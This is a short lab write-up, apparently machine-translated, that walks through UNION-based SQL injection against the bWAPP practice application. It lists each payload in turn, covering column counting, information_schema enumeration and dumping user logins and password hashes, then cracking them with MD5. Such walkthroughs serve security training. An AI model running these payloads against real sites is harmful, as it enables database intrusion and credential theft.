当前位置:网站首页>SQL Injection (GET/Search)

SQL Injection (GET/Search)

2022-07-03 13:37:00 this is hhhhp

 1. Determine the injection point

Input '            Tips : near '%'' at line 1

1111' or 1=1 #

No abnormality

2. Determine the number of fields 

' order by 10 #

' order by 7 #

7 A field

 3. Determine the displayable fields :

-1' union select 1,2,3,4,5,6,7 #

 2,3,4,5 Is a displayable field

 4. Blast storage :

-1' union select 1,database(),3,4,5,6,7 #

Library name :bWAPP

 5. Explosion meter :

-1' union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database()#

altogether 5 A watch , Obviously we need to use users

 6. Pop field name 

-1' union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema=database() and table_name='users'#

altogether 9 A field , We need to login,admin,password

 7. Pop field content 

-1' union select 1,login,password,4,admin,6,7 from bWAPP.users#

Two in all

8.md5 Decrypt   md5 Online decryption ,md5 Decryption encryption

A.I.M.                    bug
bee                        bug

原网站

版权声明
本文为[this is hhhhp]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/02/202202150520252798.html

边栏推荐

猜你喜欢

随机推荐